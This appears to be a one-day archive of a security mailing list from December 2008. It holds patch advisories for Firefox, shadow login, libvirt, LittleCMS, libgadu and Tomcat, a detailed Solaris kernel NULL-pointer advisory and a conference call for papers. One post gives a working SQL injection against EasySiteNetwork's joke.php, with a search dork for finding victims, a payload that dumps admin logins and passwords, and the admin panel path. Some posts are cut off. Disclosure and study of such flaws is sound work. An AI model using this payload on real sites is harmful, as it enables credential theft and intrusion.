CONFidence 2009, CFP

2008-12-18 Thread Andrzej Targosz
Attention!

Calling all practitioners in the field of IT security! The 5th edition of the 
best Polish IT security conference, CONFIDENCE 2008, is taking place in May 
15/16, 2008.

We invite all to send the proposed topic and abstracts of presentation till the 
end of January. Please, remember that CONFidence is an open, international 
conference and all presentations should be given in English. If you want to 
give your lecture in Polish, please send an e-mail to the address given below.

The answer to CfP should include:
# name, last name and e-mail address of the potential speaker
# speaker's short bio, describing his experience and skills
# speaker's place of residence
# presentation topic with short description of proposed lecture (no more than 
500 words)
# non-standard technical requirements

Applications should be sent to andrzej.targo...@}proidea.org.pl till 31 
January, 2009.

We are especially interested in presentations concerning:
# 3G/4G, SS7, WLAN, RFID, Bluetooth Security
# Analysis and reverse engineering of malicious code
# Analysis of vulnerability, attacks and defence against networks, hardware, 
software
# Virtualization and operating systems security
# Data recovery, Forensic and Incident Response
# Physical security
# Firewall technologies
# Web applications security and cryptographic

Caution!
We do not accept marketing, non-technical presentations aimed at presenting and 
selling any products. If your lecture presents a company or its product, please 
do not send it!

CONFidence conference is a non-profit event and speakers are not being paid. 
However, we always try to provide financial help and cover travel expenses and 
accommodation if possible. It needs to be agreed upon after acceptance of the 
submission, though.

CONFidence Team
http://2009.confidence.org.pl



[ MDVSA-2008:245 ] firefox

2008-12-18 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2008:245
 http://www.mandriva.com/security/
 ___

 Package : firefox
 Date: December 17, 2008
 Affected: 2009.0
 ___

 Problem Description:

 Security vulnerabilities have been discovered and corrected in
 the latest Mozilla Firefox 3.x, version 3.0.5 (CVE-2008-5500,
 CVE-2008-5501, CVE-2008-5502, CVE-2008-5505, CVE-2008-5506,
 CVE-2008-5507, CVE-2008-5508, CVE-2008-5510, CVE-2008-5511,
 CVE-2008-5512, CVE-2008-5513).
 
 This update provides the latest Mozilla Firefox 3.x to correct
 these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5500
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5501
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5502
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5505
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5506
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5507
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5508
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5510
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5511
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5512
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5513
 
http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.5
 ___

 Updated Packages:

 Mandriva Linux 2009.0:

EasySiteNetwork (joke.php?id) Remote SQL injection Vulnerability

2008-12-18 Thread Ehsan_Hp200
 ###  IRANIN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
##  EasySiteNetwork (joke.php?id)
##
###
###
###
###
##
## AuTh0r : Ehsan_hp200
##
## H0ME   : www.only-4dl.tk
##
## Email  : ehsan_hp...@hotmail.com
##  
## VENDOR: http://www.easysitenetwork.com/
##
## Persian Gulf 4 Ever!
#
#
#
#
##
##

Dork :  inurl:joke.php?id= "Powered by EasySiteNetwork"


 Exploit:

 
www.victim.com/joke.php?id=-1992+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+admin_login--


###
Admin Panel: www.victim.com/siteadmin

Special thanks to: All Parsi Hacker security Team members, SAHAND SHABAN, 
Dj7xpl, The.Mo3tafa, Jasoos Team, Enigma2

 ###  IRANIN THE BEST HACKERS IN THE WORLD 
##


php python extension safe_mode bypass

2008-12-18 Thread amir



[USN-695-1] shadow vulnerability

2008-12-18 Thread Kees Cook
===
Ubuntu Security Notice USN-695-1  December 18, 2008
shadow vulnerability
https://launchpad.net/bugs/306082
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  login   1:4.0.13-7ubuntu3.4

Ubuntu 7.10:
  login   1:4.0.18.1-9ubuntu0.2

Ubuntu 8.04 LTS:
  login   1:4.0.18.2-1ubuntu2.2

Ubuntu 8.10:
  login   1:4.1.1-1ubuntu1.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Paul Szabo discovered a race condition in login.  While setting up
tty permissions, login did not correctly handle symlinks.  If a local
attacker were able to gain control of the system utmp file, they could
cause login to change the ownership and permissions on arbitrary files,
leading to a root privilege escalation.


Updated packages for Ubuntu 6.06 LTS:


[USN-694-1] libvirt vulnerability

2008-12-18 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-694-1  December 18, 2008
libvirt vulnerability
CVE-2008-5086
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  libvirt0   0.3.0-0ubuntu2.1

Ubuntu 8.04 LTS:
  libvirt0   0.4.0-2ubuntu8.1

Ubuntu 8.10:
  libvirt0   0.4.4-3ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that libvirt did not mark certain operations as read-only. A
local attacker may be able to perform privileged actions such as migrating
virtual machines, adjusting autostart flags, or accessing privileged data in
the virtual machine memory and disks.


Updated packages for Ubuntu 7.10:


[SECURITY] CVE-2008-2938 - Apache Tomcat information disclosure vulnerability - Update 2

2008-12-18 Thread Mark Thomas

CVE-2008-2938: Apache Tomcat information disclosure vulnerability - Update 2

Severity: Important

Vendor:
Multiple (was The Apache Software Foundation)

Versions Affected:
Various

Description (new information):
This vulnerability was originally reported to the Apache Software Foundation as
a Tomcat vulnerability. Investigations quickly identified that the root cause
was an issue with the UTF-8 charset implementation within the JVM. The issue
existed in multiple JVMs including current versions from Sun, HP, IBM, Apple and
Apache.

It was decided to continue to report this as a Tomcat vulnerability until such
time as the JVM vendors had released fixed versions.

Unfortunately, the release of fixed JVMs and associated vulnerability disclosure
has not been co-ordinated. There has been some confusion within the user
community as to the nature and root cause of CVE-2008-2938. Therefore, the
Apache Tomcat Security Team is issuing this update to clarify the situation.

Mitigation:
Contact your JVM vendor for further information.
Tomcat users may upgrade as follows to a Tomcat version that contains a 
workaround:
6.0.x users should upgrade to 6.0.18
5.5.x users should upgrade to 5.5.27
4.1.x users should upgrade to 4.1.39

Credit:
This additional information was discovered by the Apache security
team.

References:
http://tomcat.apache.org/security.html

Mark Thomas



[USN-690-3] Firefox vulnerabilities

2008-12-18 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-690-3  December 18, 2008
firefox vulnerabilities
CVE-2008-5500, CVE-2008-5503, CVE-2008-5506, CVE-2008-5507,
CVE-2008-5511, CVE-2008-5512
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  firefox 1.5.dfsg+1.5.0.15~prepatch080614i-0ubuntu1

After a standard system upgrade you need to restart Firefox to effect the
necessary changes.

Details follow:

Several flaws were discovered in the browser engine. These problems could allow
an attacker to crash the browser and possibly execute arbitrary code with user
privileges. (CVE-2008-5500)

Boris Zbarsky discovered that the same-origin check in Firefox could be
bypassed by utilizing XBL-bindings. An attacker could exploit this to read data
from other domains. (CVE-2008-5503)

Marius Schilder discovered that Firefox did not properly handle redirects to
an outside domain when an XMLHttpRequest was made to a same-origin resource.
It's possible that sensitive information could be revealed in the
XMLHttpRequest response. (CVE-2008-5506)

Chris Evans discovered that Firefox did not properly protect a user's data when
accessing a same-domain Javascript URL that is redirected to an unparsable
Javascript off-site resource. If a user were tricked into opening a malicious
website, an attacker may be able to steal a limited amount of private data.
(CVE-2008-5507)

Several flaws were discovered in the Javascript engine. If a user were tricked
into opening a malicious website, an attacker could exploit this to execute
arbitrary Javascript code within the context of another website or with chrome
privileges. (CVE-2008-5511, CVE-2008-5512)


Updated packages for Ubuntu 6.06 LTS:


[USN-690-2] Firefox vulnerabilities

2008-12-18 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-690-2  December 18, 2008
firefox vulnerabilities
CVE-2008-5500, CVE-2008-5503, CVE-2008-5504, CVE-2008-5506,
CVE-2008-5507, CVE-2008-5508, CVE-2008-5510, CVE-2008-5511,
CVE-2008-5512, CVE-2008-5513
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  firefox 2.0.0.19+nobinonly1-0ubuntu0.7.10.1

After a standard system upgrade you need to restart Firefox to effect the
necessary changes.

Details follow:

Several flaws were discovered in the browser engine. These problems could allow
an attacker to crash the browser and possibly execute arbitrary code with user
privileges. (CVE-2008-5500)

Boris Zbarsky discovered that the same-origin check in Firefox could be
bypassed by utilizing XBL-bindings. An attacker could exploit this to read data
from other domains. (CVE-2008-5503)

Several problems were discovered in the JavaScript engine. An attacker could
exploit feed preview vulnerabilities to execute scripts from page content with
chrome privileges. (CVE-2008-5504)

Marius Schilder discovered that Firefox did not properly handle redirects to
an outside domain when an XMLHttpRequest was made to a same-origin resource.
It's possible that sensitive information could be revealed in the
XMLHttpRequest response. (CVE-2008-5506)

Chris Evans discovered that Firefox did not properly protect a user's data when
accessing a same-domain Javascript URL that is redirected to an unparsable
Javascript off-site resource. If a user were tricked into opening a malicious
website, an attacker may be able to steal a limited amount of private data.
(CVE-2008-5507)

Chip Salzenberg, Justin Schuh, Tom Cross, and Peter William discovered Firefox
did not properly parse URLs when processing certain control characters.
(CVE-2008-5508)

Kojima Hajime discovered that Firefox did not properly handle an escaped null
character. An attacker may be able to exploit this flaw to bypass script
sanitization. (CVE-2008-5510)

Several flaws were discovered in the Javascript engine. If a user were tricked
into opening a malicious website, an attacker could exploit this to execute
arbitrary Javascript code within the context of another website or with chrome
privileges. (CVE-2008-5511, CVE-2008-5512)

Flaws were discovered in the session-restore feature of Firefox. If a user were
tricked into opening a malicious website, an attacker could exploit this to
perform cross-site scripting attacks or execute arbitrary Javascript code with
chrome privileges. (CVE-2008-5513)


Updated packages for Ubuntu 7.10:


[USN-693-1] LittleCMS vulnerability

2008-12-18 Thread Kees Cook
===
Ubuntu Security Notice USN-693-1  December 17, 2008
LittleCMS vulnerability
CVE-2008-5317
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  liblcms1   1.16-5ubuntu3.1

Ubuntu 8.04 LTS:
  liblcms1   1.16-7ubuntu1.1

Ubuntu 8.10:
  liblcms1   1.16-10ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that certain gamma operations in lcms were not
correctly bounds-checked.  If a user or automated system were tricked into
processing a malicious image, a remote attacker could crash applications
linked against liblcms1, leading to a denial of service, or possibly
execute arbitrary code with user privileges.


Updated packages for Ubuntu 7.10:


Re: Joomla: Session hijacking vulnerability, CVE-2008-4122

2008-12-18 Thread darkz . gsa
Yes, I can reproduce this behavior. The application should reinitialize the 
cookie after the login, but instead it will keep the previous cookie. An 
interesting thing: this is valid only for the login_module; the administrator 
login page does not automatically redirect to HTTPS by configuration.


[USN-692-1] Gadu vulnerability

2008-12-18 Thread Kees Cook
===
Ubuntu Security Notice USN-692-1  December 17, 2008
ekg, libgadu vulnerability
CVE-2008-4776
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libgadu3    1:1.6+20051103-1ubuntu1.1

Ubuntu 7.10:
  libgadu3    1:1.7~rc2-2ubuntu0.7.10.1

Ubuntu 8.04 LTS:
  libgadu3    1:1.7~rc2-2ubuntu0.8.04.1

Ubuntu 8.10:
  libgadu3    1:1.8.0+r592-1ubuntu0.1

After a standard system upgrade you need to restart your session to effect
the necessary changes.

Details follow:

It was discovered that the Gadu library, used by some Instant Messaging
clients, did not correctly verify certain packet sizes from the server.
If a user connected to a malicious server, clients using Gadu could be
made to crash, leading to a denial of service.


Updated packages for Ubuntu 6.06 LTS:


Updated packages for Ubuntu 7.10:


Firefox cross-domain text theft (CESA-2008-011)

2008-12-18 Thread Chris Evans
Hi,

Firefoxes 2.0.0.19 and 3.0.5 fix a cross-domain theft of textual data.
The theft is via cross-domain information leaks in JavaScript error
messages for scripts executed via 

[TKADV2008-015] Sun Solaris SIOCGTUNPARAM IOCTL Kernel NULL pointer dereference

2008-12-18 Thread Tobias Klein

Please find attached a detailed advisory of the vulnerability.

Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2008-015.txt
Advisory:               Sun Solaris SIOCGTUNPARAM IOCTL Kernel NULL pointer
                        dereference
Advisory ID:            TKADV2008-015
Revision:               1.0
Release Date:           2008/12/17
Last Modified:          2008/12/17
Date Reported:          2007/09/04
Author:                 Tobias Klein (tk at trapkit.de)
Affected Software:      Solaris 10 without patch 13-01 (SPARC)
                        Solaris 10 without patch 138889-01 (x86)
                        OpenSolaris < snv_77 (SPARC)
                        OpenSolaris < snv_77 (x86)
Remotely Exploitable:   No
Locally Exploitable:    Yes
Vendor URL:             http://www.sun.com
Vendor Status:          Vendor has released an updated version
Patch development time: 471 days


======================
Vulnerability Details:
======================

The kernel of Solaris contains a vulnerability in the code that handles 
SIOCGTUNPARAM IOCTL requests. Exploitation of this vulnerability can 
result in:

1) local denial of service attacks (system crash due to a kernel panic), or

   [ As all Solaris Zones (Containers) share the same kernel it is possible
   to crash the whole system (all Zones) even if the vulnerability is 
   triggered in an unprivileged non-global zone. ]

2) local execution of arbitrary code at the kernel level (complete system 
   compromise) on x86 platforms

   [ As all Solaris Zones (Containers) share the same kernel it is possible
   to escape from unprivileged non-global zones and compromise other non-
   global zones or the global zone. ]

The issue can be triggered by sending a specially crafted IOCTL request to 
the kernel.


==================
Technical Details:
==================

The following source code references are based on the kernel source code
available from http://www.opensolaris.org.

http://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/uts/common/inet/ip/ip.c:

[...]
26692 void
26693 ip_process_ioctl(ipsq_t *ipsq, queue_t *q, mblk_t *mp, void *arg)
26694 {
[...]
26717 [1]    ci.ci_ipif = NULL;
[...]
26735        case TUN_CMD:
[...]
26740 [2]        err = ip_extract_tunreq(q, mp, &ci.ci_ipif, ip_process_ioctl);
26741            if (err != 0) {
26742                ip_ioctl_finish(q, mp, err, IPI2MODE(ipip), NULL);
26743                return;
26744            }
[...]
26782        if (!(ipip->ipi_flags & IPI_WR)) {
[...]
26788 [3]        err = (*ipip->ipi_func)(ci.ci_ipif, ci.ci_sin, q, mp, ipip,
26789                ci.ci_lifr);
[...]

[1] The value of "ci.ci_ipif" is set to "NULL".
[2] When a SIOCGTUNPARAM IOCTL is called the switch case "TUN_CMD" is 
chosen and the "ip_extract_tunreq()" function gets called. 
[3] If the return value of the "ip_extract_tunreq()" function is 0 the 
"ci.ci_ipif" variable is later on used as the first parameter for the  
"ip_sioctl_tunparam()" function. 

http://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/uts/common/inet/ip/ip_if.c:

[...]
9468 int
9469 ip_sioctl_tunparam(ipif_t *ipif, sin_t *dummy_sin, queue_t *q, mblk_t *mp,
9470     ip_ioctl_cmd_t *ipip, void *dummy_ifreq)
9471 {
[...]
9499 [4]     ill = ipif->ipif_ill;
[...]

In the "ip_sioctl_tunparam()" function the first parameter "ipif" is used 
to reference some data (see [4]). 

It is possible to return from the "ip_extract_tunreq()" function (see [2]) 
with a return value of 0 while "ci.ci_ipif" is also still set to NULL. As 
"ipif" has the same value as "ci.ci_ipif", which is set to NULL, this leads
to a NULL pointer dereference (see [4]).

On x86 (32/64bit) platforms this NULL pointer dereference can be exploited 
to execute arbitrary code at the kernel level. On SPARC platforms the 
vulnerability can "only" be used for a denial of service.


=========
Solution:
=========

This issue is addressed in the following patch releases from Sun:

SPARC Platform
- Solaris 10 with patch 13-01 or later
- OpenSolaris based upon builds snv_77 or later

x86 Platform
- Solaris 10 with patch 138889-01 or later
- OpenSolaris based upon builds snv_77 or later


 
========
History:
========


  2007/09/04 - Vendor notified
  2007/09/05 - Vendor confirms the vulnerability
  2008/12/17 - Public disclosure of vulnerability details by Sun 
  2008/12/17 - Release date of this security advisory


 
========
Credits:
========


  Vulnerability found and advisory written by Tobias Klein.


===========
References:
===========

  [1] http://sunsolve.sun.com/search/document.do?assetkey=1-26-242266-1
  [2] http://www.trapkit.de/advisories/TKADV2008-015.txt


 
========
Changes:
========


  Revision 0.1 - Initial draft release to the vendor
  Revision 1.0 - Public release
  

===========
Disclaimer:
===========

The information within this advisory may
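
The flaw analysed in TKADV2008-015 above, reduced to a user-space model; this is an added example, not part of the advisory and not Solaris source. The types and the functions extract_tunreq, tunparam_unchecked, dispatch_flawed and dispatch_hardened are simplified stand-ins, the added check is one way to close the gap (not necessarily what Sun's patch does), and ENXIO is an illustrative error code.

```c
#include <errno.h>
#include <stdio.h>

/* Simplified stand-ins for the kernel types named in the advisory. */
typedef struct ill  { int ill_id; } ill_t;
typedef struct ipif { ill_t *ipif_ill; } ipif_t;

/* Role of ip_extract_tunreq(): one path returns 0 (success) without storing
 * an interface through the out-parameter. found == NULL selects that path. */
static int extract_tunreq(ipif_t *found, ipif_t **ipifp)
{
    if (found != NULL)
        *ipifp = found;
    return 0;
}

/* Role of ip_sioctl_tunparam() as shown at [4]: trusts its first argument. */
static int tunparam_unchecked(ipif_t *ipif, int *ill_id)
{
    *ill_id = ipif->ipif_ill->ill_id;   /* NULL dereference if ipif == NULL */
    return 0;
}

/* Flawed dispatch, mirroring [1]-[3]: only the return code is tested. */
int dispatch_flawed(ipif_t *found, int *ill_id)
{
    ipif_t *ci_ipif = NULL;                        /* [1] */
    int err = extract_tunreq(found, &ci_ipif);     /* [2] */
    if (err != 0)
        return err;
    return tunparam_unchecked(ci_ipif, ill_id);    /* [3] */
}

/* Hardened dispatch: a zero return code is not proof that the out-pointer
 * was filled in, so it is validated before the handler runs. */
int dispatch_hardened(ipif_t *found, int *ill_id)
{
    ipif_t *ci_ipif = NULL;
    int err = extract_tunreq(found, &ci_ipif);
    if (err != 0)
        return err;
    if (ci_ipif == NULL || ci_ipif->ipif_ill == NULL)
        return ENXIO;                   /* illustrative error code */
    return tunparam_unchecked(ci_ipif, ill_id);
}

int main(void)
{
    ill_t ill = { 7 };
    ipif_t ipif = { &ill };
    int id = -1, rc = dispatch_hardened(&ipif, &id);
    printf("valid request: rc=%d id=%d\n", rc, id);
    printf("unset pointer: rc=%d\n", dispatch_hardened(NULL, &id));
    return 0;
}
```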

[USN-690-1] Firefox and xulrunner vulnerabilities

2008-12-18 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-690-1  December 17, 2008
firefox-3.0, xulrunner-1.9 vulnerabilities
CVE-2008-5500, CVE-2008-5501, CVE-2008-5502, CVE-2008-5505,
CVE-2008-5506, CVE-2008-5507, CVE-2008-5508, CVE-2008-5510,
CVE-2008-5511, CVE-2008-5512, CVE-2008-5513
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  firefox-3.0     3.0.5+nobinonly-0ubuntu0.8.04.1
  xulrunner-1.9   1.9.0.5+nobinonly-0ubuntu0.8.04.1

Ubuntu 8.10:
  abrowser        3.0.5+nobinonly-0ubuntu0.8.10.1
  firefox-3.0     3.0.5+nobinonly-0ubuntu0.8.10.1
  xulrunner-1.9   1.9.0.5+nobinonly-0ubuntu0.8.10.1

After a standard system upgrade you need to restart Firefox and any
applications that use xulrunner, such as Epiphany, to effect the necessary
changes.

Details follow:

Several flaws were discovered in the browser engine. These problems could allow
an attacker to crash the browser and possibly execute arbitrary code with user
privileges. (CVE-2008-5500, CVE-2008-5501, CVE-2008-5502)

It was discovered that Firefox did not properly handle persistent cookie data.
If a user were tricked into opening a malicious website, an attacker could
write persistent data in the user's browser and track the user across browsing
sessions. (CVE-2008-5505)

Marius Schilder discovered that Firefox did not properly handle redirects to
an outside domain when an XMLHttpRequest was made to a same-origin resource.
It's possible that sensitive information could be revealed in the
XMLHttpRequest response. (CVE-2008-5506)

Chris Evans discovered that Firefox did not properly protect a user's data when
accessing a same-domain Javascript URL that is redirected to an unparsable
Javascript off-site resource. If a user were tricked into opening a malicious
website, an attacker may be able to steal a limited amount of private data.
(CVE-2008-5507)

Chip Salzenberg, Justin Schuh, Tom Cross, and Peter William discovered Firefox
did not properly parse URLs when processing certain control characters.
(CVE-2008-5508)

Kojima Hajime discovered that Firefox did not properly handle an escaped null
character. An attacker may be able to exploit this flaw to bypass script
sanitization. (CVE-2008-5510)

Several flaws were discovered in the Javascript engine. If a user were tricked
into opening a malicious website, an attacker could exploit this to execute
arbitrary Javascript code within the context of another website or with chrome
privileges. (CVE-2008-5511, CVE-2008-5512)

Flaws were discovered in the session-restore feature of Firefox. If a user were
tricked into opening a malicious website, an attacker could exploit this to
perform cross-site scripting attacks or execute arbitrary Javascript code with
chrome privileges. (CVE-2008-5513)


Updated packages for Ubuntu 8.04 LTS:
